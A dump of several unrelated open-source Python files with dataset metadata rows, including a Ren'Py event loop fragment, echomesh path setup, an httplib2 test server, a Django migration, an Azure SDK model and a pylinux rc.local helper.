renpy.display.behavior.skipping(ev)
self.event_time = end_time = get_time()
try:
if self.touch:
renpy.display.gesture.recognizer.event(ev, x, y)
rv = renpy.display.focus.mouse_handler(ev, x, y)
if rv is None:
rv = root_widget.event(ev, x, y, 0)
if rv is None:
rv = renpy.display.focus.key_handler(ev)
if rv is not None:
break
if renpy.config.inspector:
if renpy.display.behavior.map_event(ev, "inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
elif renpy.display.behavior.map_event(ev, "full_inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
except IgnoreEvent:
if ev.type != TIMEEVENT:
self.post_time_event()
needs_redraw |= renpy.display.render.check_redraws()
if self.restart_interaction:
return True, None
if trans_pause and rv:
self.suppress_transition = True
# after this.
return False, rv
except EndInteraction as e:
return False, e.value
finally:
renpy.game.context().say_attributes = None
# Clean out the overlay layers.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
# Stop ongoing preloading.
renpy.display.im.cache.end_tick()
# We no longer disable periodic between interactions.
# pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(TIMEEVENT, 0)
pygame.time.set_timer(REDRAW, 0)
self.consider_gc()
renpy.game.context().runtime += end_time - start_time
# Restart the old interaction, which also causes a
# redraw if needed.
self.restart_interaction = True
renpy.plog(1, "end interact_core")
# print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
def finish_pending(self):
self.check_background_screenshot()
| true | true |
f72ecbc1483d9983735ec38c6681592f9d32e01b | 2,625 | py | Python | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | 1 | 2019-06-27T11:34:13.000Z | 2019-06-27T11:34:13.000Z | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| 28.846154 | 82 | 0.719238 | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| true | true |
f72eccac332916dcfea55705b3733758b36e79f1 | 3,779 | py | Python | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
# output via logging so nose can catch it
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
"""Mixin that allows serve_forever to be shut down.
The methods in this mixin are backported from SocketServer.py in the Python
2.6.4 standard library. The mixin is unnecessary in 2.6 and later, when
BaseServer supports the shutdown method directly.
"""
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will deadlock.
"""
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| 33.149123 | 79 | 0.629796 | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| true | true |
f72ece2577e1c7ce79389ad64b2bed43d07b14b5 | 9,235 | py | Python | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | null | null | null | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 11 | 2019-03-19T02:03:11.000Z | 2019-05-31T07:20:59.000Z | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 2 | 2020-08-10T10:17:10.000Z | 2021-10-31T23:20:53.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-10 08:47
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| 67.408759 | 666 | 0.63216 |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| true | true |
f72ece5f6adcb5d43dae9e1a19b386550d5d1375 | 1,895 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Usage(Model):
"""Describes Compute Resource Usage.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar unit: Required. An enum describing the unit of usage measurement.
Default value: "Count" .
:vartype unit: str
:param current_value: Required. The current usage of the resource.
:type current_value: int
:param limit: Required. The maximum permitted usage of the resource.
:type limit: long
:param name: Required. The name of the type of usage.
:type name: ~azure.mgmt.compute.v2016_03_30.models.UsageName
"""
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| 34.454545 | 82 | 0.594195 |
from msrest.serialization import Model
class Usage(Model):
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| true | true |
f72ecf12d2a5bde9b692d56fb3192d8e48a7530b | 1,188 | py | Python | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# coding=utf-8
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
"""
rc.local的配置文件类
"""
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
"""
增加启动项
:param name:
:param cmd:
"""
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| 33.942857 | 100 | 0.733165 |
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
